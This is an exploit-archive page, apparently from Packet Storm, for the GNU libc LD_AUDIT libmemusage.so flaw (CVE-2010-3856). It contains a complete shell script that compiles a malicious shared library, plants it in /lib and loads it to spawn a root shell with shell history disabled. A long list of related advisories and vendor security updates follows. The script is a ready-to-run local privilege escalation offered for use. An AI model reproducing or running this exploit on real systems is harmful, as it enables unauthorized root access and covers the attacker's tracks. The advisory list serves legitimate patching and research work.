Lucene search
Saeid BostandoustPACKETSTORM:128999HistoryNov 06, 2014 - 12:00 a.m.
GNU libc 2.12.1 LD_AUDIT libmemusage.so Local Root
2014-11-0600:00:00
Saeid Bostandoust
packetstormsecurity.com
83
0.0004 Low
EPSS
Percentile
0.4%
`#!/bin/sh
# Exploit Title: GNU libc <= 2.12.1 LD_AUDIT Root Exploit
# Date: 05/11/2014
# Exploit Author: ssbostan
# Vendor Homepage: http://www.gnu.org/software/libc/
# Software Link: http://ftp.gnu.org/gnu/glibc/
# Version: <= 2.12.1
# Tested on: Ubuntu 8.04
# CVE: http://www.cvedetails.com/cve/CVE-2010-3856/
umask 0
cat > /tmp/libxpl.c << EOF
__attribute__((constructor)) void init()
{
setuid(0);
setgid(0);
unlink("/lib/libxpl.so");
setenv("HISTFILE", "/dev/null", 1);
execl("/bin/sh", "/bin/sh", "-i", 0);
}
EOF
gcc -w -fPIC -shared -o /tmp/libxpl.so /tmp/libxpl.c
LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="/lib/libxpl.so" ping 2>/dev/null
cat /tmp/libxpl.so > /lib/libxpl.so
rm -rf /tmp/libxpl.c /tmp/libxpl.so
LD_AUDIT="libxpl.so" ping
`
Related
fedora
fedora
[SECURITY] Fedora 14 Update: glibc-2.12.90-18
2010-10-28 22:21:37
[SECURITY] Fedora 12 Update: glibc-2.11.2-3
2010-10-30 23:47:35
[SECURITY] Fedora 13 Update: glibc-2.12.1-4
2010-10-28 22:19:55
packetstorm
packetstorm
Debian 5.0.6 / Ubuntu 10.04 Webshell To Remote Root
2010-10-28 00:00:00
glibc LD_AUDIT Privilege Escalation
2011-11-10 00:00:00
GNU libc 2.12.1 LD_AUDIT libpcprofile.so Local Root
2014-11-06 00:00:00
nessus
nessus
Mandriva Linux Security Advisory : glibc (MDVSA-2010:212)
2010-10-25 00:00:00
Fedora 14 : glibc-2.12.90-18 (2010-16851)
2010-10-29 00:00:00
zdt
zdt
Glibc 2.11.3 / 2.12.x LD_AUDIT libmemusage.so Local Root Exploit
2013-05-19 00:00:00
glibc LD_AUDIT libmemusage.so RHEL-Based Arbitrary DSO Load Privilege Escalation Exploit
2018-04-01 00:00:00
glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation Exploit
2018-02-10 00:00:00
openvas
openvas
CentOS Update for glibc CESA-2010:0793 centos5 i386
2011-08-09 00:00:00
CentOS Update for glibc CESA-2010:0793 centos5 i386
2011-08-09 00:00:00
Fedora Update for glibc FEDORA-2010-16851
2010-12-02 00:00:00
veracode
veracode
Privilege Escalation
2020-04-10 00:49:52
slackware
slackware
[slackware-security] glibc
2010-10-29 04:49:56
exploitpack
exploitpack
glibc - LD_AUDIT Arbitrary DSO Load Privilege Escalation
2011-11-10 00:00:00
centos
centos
glibc, nscd security update
2010-10-26 06:41:49
prion
prion
Design/Logic Flaw
2011-01-07 19:00:00
d2
d2
DSquare Exploit Pack: D2SEC_CVE_2010_3856
2011-01-07 19:00:00
redhat
redhat
(RHSA-2010:0793) Important: glibc security update
2010-10-25 00:00:00
(RHSA-2010:0872) Important: glibc security and bug fix update
2010-11-10 00:00:00
canvas
canvas
Immunity Canvas: CVE_2010_3856
2011-01-07 19:00:00
oraclelinux
oraclelinux
glibc security update
2010-10-25 00:00:00
glibc security and bug fix update
2011-02-10 00:00:00
seebug
seebug
glibc LD_AUDIT arbitrary DSO load Privilege Escalation
2014-07-01 00:00:00
GNU C library dynamic linker LD_AUDIT arbitrary DSO load Vulnerability
2014-07-01 00:00:00
debiancve
debiancve
CVE-2010-3856
2011-01-07 19:00:00
ubuntucve
ubuntucve
CVE-2010-3856
2010-10-22 00:00:00
cve
cve
CVE-2010-3856
2011-01-07 19:00:00
exploitdb
exploitdb
securityvulns
securityvulns
GNU C dynamic linker privilege escalation
2010-10-26 00:00:00
osv
osv
glibc - privilege escalation
2010-10-22 00:00:00
glibc - local privilege escalation
2010-10-22 00:00:00
ubuntu
ubuntu
GNU C Library vulnerabilities
2010-10-22 00:00:00
GNU C Library vulnerability
2011-01-12 00:00:00
debian
debian
[SECURITY] [DSA 2122-1] New glibc packages fix local privilege escalation
2010-10-22 17:05:47
[SECURITY] [DSA 2122-2] New glibc packages fix privilege escalation
2011-01-11 19:49:25
metasploit
metasploit
glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation
2018-01-28 05:11:38
vmware
vmware
gentoo
gentoo
GNU C library: Multiple vulnerabilities
2010-11-15 00:00:00
suse
suse
local privilege escalation in glibc
2010-10-28 13:41:00